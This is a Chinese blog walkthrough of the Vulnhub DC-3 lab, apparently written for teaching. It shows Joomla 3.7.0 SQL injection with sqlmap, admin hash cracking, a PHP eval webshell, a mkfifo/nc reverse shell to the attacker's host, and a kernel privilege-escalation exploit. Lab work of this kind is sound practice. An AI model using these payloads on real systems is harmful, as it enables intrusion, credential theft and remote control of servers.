首页 > 其他分享 >综合靶场DC-3

综合靶场DC-3

时间:2024-10-08 19:18:54浏览次数:3  
标签:http -- DC 192.168 63.131 输入 靶场 com 综合

一、环境搭建:

1、靶场描述

DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAu7上推我让你重新开始。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。对于那些有CTF和Boot2Root挑战经验的人来说,这可能不会花你很长时间(事实上,它可能只需要不到20分钟)。如果是这种情况,如果你想让它更具挑战性,你可以重做挑战,探索其他获得根和获得旗帜的方法。

只有一个flag

2、下载靶场环境

    靶场下载地址:

https://www.vulnhub.com/entry/dc-32,312/

二、渗透靶场

 1、KALI和DC-3都在NAT模式下打开虚拟机点击DC-3右键点击设置

2、DC-3里面需要修改一些东西,把DC里面的改成IDE 0:0都完成后开启KALI和DC-3 

3、先确认KALI和DC-3所在的网段输入:ifconfig

 确认了KALI和DC-3所在的网段为192.168.63.128/24网段 

 4、查找DC-3IP可以使用nmap

确认了kali:192.168.63.128

           DC-3:192.168.63.131

输入:nmap -sP 192.168.63.131

 5、信息收集:探端口及服务

输入:nmap -A -p- -v 192.168.66.142

-A 综合性扫描

-v 冗余模式。强烈推荐使用这个选项,它会给出扫描过程中的详细信息

发现开放了80端口,存在web服务,Apache/2.4.18,CMS为Joomla 

访问网站打开虚拟机里面的火狐在URL中输入:192.168.63.131

6、利用JoomScan进行扫描获取后台地址

 由于我们前面采用nmap进行扫描时我们已经发现了中间件为joomla,我们可以采用joomscan进行扫描,如果我们不知道是joomla,我们可以采用目录扫描或者nikto等扫描工具进行扫描。发现更多的信息。

(1).JoomScan简介OWASPJoomla!漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。该工具基于Perl开发,能够轻松无缝地对各种Joomla项目进行漏洞扫描,其轻量化和模块化的架构能够保证扫描过程中不会留下过多的痕迹。它不仅能够检测已知漏洞,而且还能够检测到很多错误配置漏洞和管理权限漏洞等等。除此之外,OWASP JoomScan使用起来非常简单,不仅提供了非常友好的用户界面,而且还能够以HTML或文本格式导出扫描报告。

(2).JoomScan简单使用

执行默认检测:

perl joomscan.pl --url www.example.com

perl joomscan.pl -u www.example.com

枚举已安装的组件:

perl joomscan.pl --url www.example.com --enumerate-components

perl joomscan.pl -u www.example.com –ec

设置cookie:

perl joomscan.pl --url www.example.com --cookie "test=demo;"

设置user-agent:

perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1(+http://www.googlebot.com/bot.html)"

perl joomscan.pl -u www.example.com -a "Googlebot/2.1(+http://www.googlebot.com/bot.html)"

设置随机user-agent

perl joomscan.pl -u www.example.com --random-agent

perl joomscan.pl --url www.example.com -r

更新JoomScan:

perl joomscan.pl –update

(3).joomScan扫描

joomscan --url http://192.168.66.142  提示没有joomscan 选择y安装

先输入:apt update

输入:apt-get install joomscan 

 输入:joomscan --url http://192.168.63.131 提示没有joomscan 选择y安装

扫描结果如页面所示 

 知道了joomla cms版本为3.7.0

得到了网站后台地址 http://192.168.63.131/administrator

打开虚拟机中的火狐在url中输入:192.168.63.131/administrator/

利用nikto扫描获取后台地址

7、(1).Nikto简介

    Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。

(2).Nikto简单使用

①、常规扫描

nikto -host/-h http://127.0.0.1

nikto -h http://127.0.0.1

②、可以指定端口进行扫描,同样可以指定SSL协议,进行HTTPS扫描。

nikto -h http:// 127.0.0.1 -p 443 ssl

③、指定子目录进行目录爆破

nikto -h http:// 127.0.0.1 -C /dvwa

④、批量扫描

nikto -host list.txt

⑤、升级更新插件

nikto -update

⑥、查看工具版本和插件版本

nikto -V

⑦、查看插件信息

nikto -list-plugins

⑧、命令查看帮助信息

nikto

⑨、查看更详细的帮助信息

nikto -H

man nikto

(3).Nikto扫描

   输入:nikto --ur http://192.168.63.131/

8、 查找漏洞发现存在SQL注入    我们前面知道了CMS为joomla,版本为3.7.0  使用searchsploit检查到有对应的漏洞

输入:searchsploit joomla 3.7.0

输入: searchsploit -m 42033.txt

输入: cat 42033.txt 

可以看到poc,来验证一下,在火狐中

输入:http://192.168.63.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

 

可以看到提示,数据库语句错误 

 9、sqlmap跑出数据

(1)跑出所有数据库

sqlmap -u "http://192.168.63.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] –batch

(2)获取当前数据库的名字joomladb

sqlmap -u "http://192.168.63.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db –batch

(3).sqlmap -u "http://192.168.63.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables --batch

(4).获取joomladb的users表的字段名

sqlmap -u "http://192.168.63.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

输入:y 

第二个选项,使用“y”,不要使用默认的,不然会出错 

 第三个选项随意

第四个选项使用10线程 

 最终跑出来6个字段

 (5).获取目标字段username和password

sqlmap -u "http://192.168.63.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch

获得结果如下
拿到一个用户名和加密的密码

10、 利用john爆破密码snoopy

复制admin里面的

输入:echo  $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu > 1.txt

输入:cat 1.txt 

使用john破解出admin密码是snoopy 

输入:John 1.txt

11、利用获取到的账号密码进行登录

在火狐中URL里面输入:http://192.168.63.131/administrator/

输入:admin/snoopy

12、上传webshell

    发现一个上传

 点击Beez3 Details and Files进入

我们发现可以上传文件,考虑上传木马,也可以创建文件进行编辑

要上传木马,我们先要找到当前文件所在的目录:

输入:http://192.168.63.131/templates/beez3/html/ 

回到刚才的页面点击new file
在html下创建一个php文件,名字叫做shell

 创建成功之后,跳到编辑页面,然后我们输入php一句话,点击左上角绿色的save进行保存

<?php

echo ("密码是a");

@eval($_REQUEST [a]);

?>

 

再次访问http://192.168.63.131/templates/beez3/html/
发现多了一个shell.php文件,我们访问一下

 

访问webshell,得到我们设置的会先内容,文件上传成功

输入:http://192.168.63.131/templates/beez3/html/shell.php

 

13、在桌面找到蚁剑打开右键添加数据 去虚拟机火狐中的URL里复制并粘贴到蚁剑中密码是a

 

右键进入虚拟终端执行whaomi查询我权限,是www-data权限 

 

 

14、反弹shell到kali 

回到虚拟机kali页面输入:nc -lvvp 1234

 

 

再回到蚁剑这里使用kali本机的IP地址

输入: nc -e /bin/bash 192.168.63.128 1234

发现-e参数不可用

 

使用如下目录连接

使用kali本机的IP地址

输入:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.63.128 1234 >/tmp/f

 

返回kali输入 ls

 

15、 创建交互式shell

    经常用shell的都知道这个shell不好用,我们建立一个交互式shell

    常用的就是python创建交互式shell

输入:python3 -c 'import pty; pty.spawn("/bin/bash")'

 

16、 使用辅助脚本发现提权漏洞

(1).下载辅助脚本Linux-Exploit-Suggester.sh

下载地址:GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool

 (2).上传辅助脚本

    我们直接在蚁剑中上传双击点开192.168.63.131然后右键点击上传文件选择D盘中的DC-3 linux里面的第三个打开

 

 

 

 (3)发现漏洞

返回kali

输入:ls -l linux-exploit-suggester.sh

 

 发现没有执行权限,我们给他加个执行文件

输入:chmod +x linux-exploit-suggester.sh

 

执行脚本

输入:./linux-exploit-suggester.sh

发现很多可利用漏洞

 

 

 17、.使用辅助脚本提权

(1).获取提权脚本

    上面发现了很多漏洞,这里我们挑一个进行提权

挑选CVE-2016-4557

 

在图片里可以看到是一个39772的文件,由于给出的那个URL无法下载

也可以去searchsploit里面去看看  

新建一个窗口输入:searchploit -m 39772.txt 

 

输入:cat 39772.txt 

 

 地址根上面一样也不能使用

 

(2)可以使用下面地址直接下载

在浏览器中下载: bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab

打开蚁剑 双击192.168.63.131右键点击上传文件选择C盘中的用户里面的admin找到下载点开选中39772.zip打开(这里的39772.zip不需要解压)

 

 

3.提权

  解压文件

unzip 39772.zip

返回kali输入:ls

unzip 39772.zip

 

cd 39772

ls

 

 tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

 

ls 

./compile.sh

 ./doubleput.c

ls

./doubleput

whoami

执行完之后,提权成功

 

18、.发现the-flag.txt

cd /root

ls

cat the-flag.txt

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

    

标签:http,--,DC,192.168,63.131,输入,靶场,com,综合
From: https://blog.csdn.net/2401_87609825/article/details/142744262

相关文章

  • Vulnhub靶场案例渗透[4]- DC3
    靶场信息靶场原地址渗透过程确定靶机ip通过虚拟机设置的网络适配器的设置,确认虚拟机的网段,使用nmap进行目标网段存活主机,确定靶机ip。nmap-sn去除已知设备的ip,得出靶机ip。确定出靶机ip的192.168.6.103探测主机开放端口nmap-A192.168.6.103已知靶机只......
  • 基于多主体主从博弈的区域综合能源系统低碳经济优化调度【分层模型】(Matlab代码实现)
      ......
  • 【核心复现】基于合作博弈的综合能源系统电-热-气协同优化运行策略(Matlab代码实现)
    ......
  • 教资 - 综合(3)
    1、(课程评价)是指根据一定的标准和课程系统信息,以科学的方法检查课程的目标、编订和实施是否实现了教育目的,实现的程度如何,以判定课程设计的效果,并据此作出改进课程的决策。2、下列关于教学模式与方法的选择依据说法错误的是(需要依据学校的要求选择教学模式与方法)3、下列选项中不......
  • 教资 - 综合(2)
    1、(教师)是教育发展的第一资源。2、教学过程中以形成学生技能、技巧和行为习惯等实际训练为主要形式的教学方法是(实践性教学方法)3、基于建构主义的5E模式学习理论,主要包括哪几个环节(吸引—探究—解释—迁移—评价)4、百年大计,教育为本,(教师)是立教之本、兴教之源。5、教师要善......
  • sql-labs靶场第四关测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、寻找注入点2、注入数据库①Orderby判断列数②判断回显地方③爆库,查看数据库名称④爆表,查看security库的所有表⑤爆列,查看users表的所有列⑥成功获取用户名和密码信息3、sqlmap注入方法......
  • sql-labs靶场第二关测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、寻找注入点2、注入数据库①Orderby判断列数②判断回显地方③爆库,查看数据库名称④爆表,查看security库的所有表⑤爆列,查看users表的所有列⑥成功获取用户名和密码信息3、sqlmap注入方法......
  • 教资 - 综合(1)
    1、教育政策制定的各个阶段,都要实行大众参与,集体领导和少数服从多数的原则指的是(民主原则)2、教育政策的制定要有利于促进教育事业的发展指的是(效益原则)3、在教育政策制定过程中核心环节是(设计和论证教育政策方案)4、任何政策都有其适用范围指的是教育政策执行的(对象的适用性)5、......
  • AssemblyQC:一个基因组组装质量评估的综合流程
    分享一篇近期发表在Bioinformatics上的文章:AssemblyQC:ANextflowpipelineforreproduciblereportingofassemblyquality,这是一个基因组组装质量评估的综合性流程,集合了准确性、连续性和完整性等多项指标(这是小编一直想做的事情,现有轮子,分享给你)。该流程基于nf(nextflo......
  • 玄机蓝队靶场_应急响应_48:第五章 linux实战-挖矿(未作出)
    参考:https://blog.csdn.net/administratorlws/article/details/139995863有机会会再做一次。一些想法:黑客利用web服务入侵成功站点后,一般除了留下web木马外,还会留有系统后门和病毒比如可能的挖矿病毒。检查web渗透入口的木马,三个方式,第一个是直接从日志里面硬找,从上传的文件......